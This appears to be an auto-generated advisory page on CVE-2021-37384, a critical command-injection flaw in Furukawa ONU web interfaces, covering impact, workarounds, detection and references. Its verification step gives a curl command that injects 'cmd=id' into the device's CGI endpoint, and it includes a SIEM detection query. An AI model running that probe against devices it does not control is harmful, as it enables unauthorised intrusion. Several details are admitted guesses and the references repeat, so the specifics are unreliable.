CVE-2021-37384 – CVE-2021-37384 is a critical remote code execut... (How to Fix)

Q: What is the severity of CVE-2021-37384?

CVE-2021-37384 has a CVSS score of 9.8 (CRITICAL). CVE-2021-37384 is a critical remote code execution vulnerability affecting certain Furukawa ONU (Optical Network Unit) models. Unauthenticated attackers can execute arbitrary commands on the device through the web interface, potentially taking full control. Organizations using vulnerable Furukawa ONU equipment are affected.

📋 TL;DR

CVE-2021-37384 is a critical remote code execution vulnerability affecting certain Furukawa ONU (Optical Network Unit) models. Unauthenticated attackers can execute arbitrary commands on the device through the web interface, potentially taking full control. Organizations using vulnerable Furukawa ONU equipment are affected.

💻 Affected Systems

Products:

Furukawa ONU models (specific models not fully documented in public sources)

Versions: Unknown specific versions - appears to affect multiple models

Operating Systems: Embedded firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in the web management interface. Default configurations appear vulnerable as no authentication is required for exploitation.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to execute arbitrary code, steal credentials, pivot to internal networks, disrupt services, or deploy persistent malware.

🟠

Likely Case

Attackers gain administrative access to the ONU, modify configurations, intercept network traffic, or disrupt internet connectivity for connected users.

🟢

If Mitigated

With proper network segmentation and access controls, impact is limited to the isolated device without lateral movement.

🌐 Internet-Facing: HIGH - Directly exposed web interfaces allow unauthenticated remote exploitation from anywhere on the internet.

🏢 Internal Only: HIGH - Even internally, unauthenticated access means any compromised internal host can exploit the vulnerability.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public exploit details and proof-of-concept code are available. The attack requires no authentication and uses simple HTTP requests.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not publicly available

Restart Required: No

Instructions:

No official patch or vendor advisory has been publicly released. Contact Furukawa directly for firmware updates.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate ONU management interfaces from untrusted networks

Access Control Lists

linux

Restrict access to ONU web interface to trusted management IPs only

iptables -A INPUT -p tcp --dport 80 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

Disable web management interface if not required for operations
Implement strict network segmentation to isolate ONU devices from internet and untrusted networks

🔍 How to Verify

Check if Vulnerable:

Check if Furukawa ONU web interface responds to unauthenticated command injection attempts. Use curl to test: curl -X POST 'http://<onu_ip>/cgi-bin/command.cgi' --data 'cmd=id'

Check Version:

Check device web interface or console for firmware version information

Verify Fix Applied:

Verify web interface no longer accepts unauthenticated commands and requires proper authentication

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /cgi-bin/ endpoints
Multiple failed authentication attempts followed by command execution
Suspicious command strings in web logs

Network Indicators:

HTTP POST requests to ONU web interface from unexpected sources
Traffic patterns showing command injection payloads

SIEM Query:

source="web_logs" AND (url="/cgi-bin/*" OR method="POST") AND (user_agent="curl/*" OR user_agent="python-requests/*") AND status=200

📊 Metadata

CVE ID: CVE-2021-37384

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-94

Published: July 17, 2023

Last Updated: November 21, 2024

🔗 References

https://cwe.mitre.org/data/definitions/94.html Not Applicable
https://gist.githubusercontent.com/LuigiPolidorio/9fe61cf2edee63152161ffc52c39f6cd/raw/529cf49103e0fdf4eeb970fa1f62fa508ebe7c3c/reference.txt Third Party Advisory
https://owasp.org/www-community/attacks/Code_Injection Not Applicable
https://www.softwall.com.br/cves/publicacao-rce-html-injection-furukawa/
https://cwe.mitre.org/data/definitions/94.html Not Applicable
https://gist.githubusercontent.com/LuigiPolidorio/9fe61cf2edee63152161ffc52c39f6cd/raw/529cf49103e0fdf4eeb970fa1f62fa508ebe7c3c/reference.txt Third Party Advisory
https://owasp.org/www-community/attacks/Code_Injection Not Applicable
https://www.softwall.com.br/cves/publicacao-rce-html-injection-furukawa/

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-37384, you might also want to check these: